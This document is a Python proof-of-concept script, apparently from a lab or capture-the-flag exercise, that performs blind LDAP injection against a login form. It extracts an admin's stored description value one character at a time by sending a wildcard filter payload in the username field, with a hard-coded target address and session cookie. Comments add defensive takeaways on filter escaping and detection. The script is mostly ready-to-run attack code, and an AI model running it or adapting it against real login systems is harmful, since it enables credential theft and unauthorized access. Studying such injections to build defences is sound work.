LDAP data exfiltration

LDAP - LDAP injection - Authentication bypass - Brute force

import requests
import string

# Blind LDAP-injection proof of concept against a login form.
#
# The script sends the same login POST repeatedly. The `username` field
# carries a filter fragment that wildcard-matches the `description`
# attribute, and the presence of `success_msg` in the response is read as
# "the current prefix matched". This only works if the server interpolates
# `username` into an LDAP search filter without escaping (presumably the
# case for the target here; the server code is not shown on this page).
#
# Defensive takeaways:
#   * Escape filter metacharacters (`*`, `(`, `)`, `\`, NUL) per RFC 4515
#     before building a filter, e.g. PHP's ldap_escape() with
#     LDAP_ESCAPE_FILTER, or use an API that builds filters from
#     structured parts.
#   * Authenticate with an LDAP bind as the user rather than a filter
#     comparison, and keep secrets out of searchable attributes such as
#     `description`.
#   * A long run of login POSTs whose username contains `)(` or `*` is a
#     strong detection signal; rate limiting and lockout slow the loop.
#
# NOTE(review): the target address and session cookie are hard-coded; they
# look like values from a lab instance and should not live in shared code.
url = "http://94.237.50.242:31867"
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "PHPSESSID=b2feampt7epd0bfb0lqmtl7i9h"
}
success_msg = "Login successful"
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$%^&*()-_=+[]{}|;:'\",.<>?/\\`~"

password = ""
max_length = 50

# One outer pass per character position, capped at max_length passes.
for _ in range(max_length):
    matched = None

    for candidate in alphabet:
        payload = f")(|(description={password}{candidate}*"

        # NOTE(review): the body is assembled by hand and sent without
        # URL-encoding or filter escaping, so the printed value is not
        # guaranteed to equal the stored attribute value.
        data = f"username=admin{payload}&password=invalid)"
        response = requests.post(url, data, headers=headers)

        # The success banner is the only oracle the loop relies on.
        if success_msg in response.text:
            matched = candidate
            break

    # No candidate extended the prefix: treat the value as complete.
    if matched is None:
        break

    password += matched
    print(f"Current password: {password}")

print(f"Password: {password}")
